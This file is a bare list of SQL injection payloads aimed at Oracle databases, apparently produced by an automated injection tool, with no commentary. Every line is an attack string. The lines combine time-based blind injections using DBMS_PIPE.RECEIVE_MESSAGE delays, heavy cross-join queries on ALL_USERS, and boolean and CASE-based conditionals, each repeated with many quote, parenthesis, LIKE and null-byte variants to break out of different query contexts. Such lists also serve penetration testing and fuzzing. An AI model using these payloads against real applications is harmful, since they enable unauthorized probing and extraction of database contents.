%')) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%'))) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%' AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00') AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00' AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') WHERE 4552=4552 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") WHERE 9860=9860 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
) WHERE 1130=1130 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' WHERE 3128=3128 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
" WHERE 3567=3567 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
 WHERE 8912=8912 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'||(SELECT 'jxFw' FROM DUAL WHERE 6764=6764 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'||(SELECT 'aVWN' WHERE 2476=2476 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'+(SELECT QOIw WHERE 4086=4086 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'+(SELECT 'aRxS' WHERE 9632=9632 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' IN BOOLEAN MODE) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
-8751
-1412) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15)
-1278') OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15)
-6579' OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15)
-1682" OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15)
-7494) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (6692=6692
-1995)) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ((1151=1151
-1224))) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (((5985=5985
-7260 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15)
-9846') OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ('bScs'='bScs
-8380')) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (('Eili'='Eili
-9834'))) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ((('zkMu'='zkMu
-6987' OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND 'cEhV'='cEhV
-3234') OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ('MlOy' LIKE 'MlOy
-8061')) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (('Ldrt' LIKE 'Ldrt
-4838'))) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ((('sdiR' LIKE 'sdiR
-2554' OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND 'EtsS' LIKE 'EtsS
-7786") OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ("Dwkr"="Dwkr
-4624")) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (("llNV"="llNV
-1855"))) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ((("GsHq"="GsHq
-5756" OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND "XFah"="XFah
-1908") OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ("Kupw" LIKE "Kupw
-5608")) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (("ecbu" LIKE "ecbu
-2753"))) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ((("WXJZ" LIKE "WXJZ
-1550" OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND "iolG" LIKE "iolG
-5387%') OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ('%'='
-8317%')) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (('%'='
-4156%'))) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ((('%'='
-4585%' OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND '%'='
-2014%00') OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ('dKmt'='dKmt
-1913%00' OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND 'AUdZ'='AUdZ
-3818') WHERE 7650=7650 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) -- 
-4458") WHERE 6564=6564 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) -- 
-5551) WHERE 6271=6271 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) -- 
-1127' WHERE 3652=3652 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) -- 
-9132" WHERE 5678=5678 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) -- 
-8242 WHERE 4243=4243 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) -- 
-9509) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-7311') OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-6487' OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-5798" OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-5375) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (1669=1669
-1992)) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((4319=4319
-1952))) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (((5772=5772
-4320 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-6652') OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('OvnL'='OvnL
-9771')) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('Gqus'='Gqus
-4569'))) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('zqPA'='zqPA
-7774' OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'Wsvv'='Wsvv
-8892') OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('alBv' LIKE 'alBv
-5172')) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('GTYv' LIKE 'GTYv
-4879'))) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('HoSt' LIKE 'HoSt
-8469' OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'AaJv' LIKE 'AaJv
-1803") OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("nbjr"="nbjr
-9058")) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("GKRi"="GKRi
-5329"))) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("FYsJ"="FYsJ
-4444" OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "fHUV"="fHUV
-4963") OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("Wotu" LIKE "Wotu
-2805")) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("TlWE" LIKE "TlWE
-4452"))) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("wApb" LIKE "wApb
-4797" OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "yXEg" LIKE "yXEg
-5239%') OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('%'='
-8539%')) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('%'='
-8994%'))) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('%'='
-6340%' OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND '%'='
-4382%00') OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('GbgQ'='GbgQ
-5422%00' OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'CHVb'='CHVb
-8027') WHERE 8486=8486 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
-2714") WHERE 6885=6885 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
-6216) WHERE 3252=3252 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
-3539' WHERE 9937=9937 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
-6466" WHERE 3579=3579 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
-8623 WHERE 9227=9227 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
(SELECT (CASE WHEN (1225=1225) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(81)||CHR(79)||CHR(90),15) ELSE 1225 END) FROM DUAL)
(SELECT (CASE WHEN (1711=1711) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1711 END) FROM DUAL)
,(SELECT (CASE WHEN (2819=2819) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(68)||CHR(116)||CHR(104),15) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN (3168=3168) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)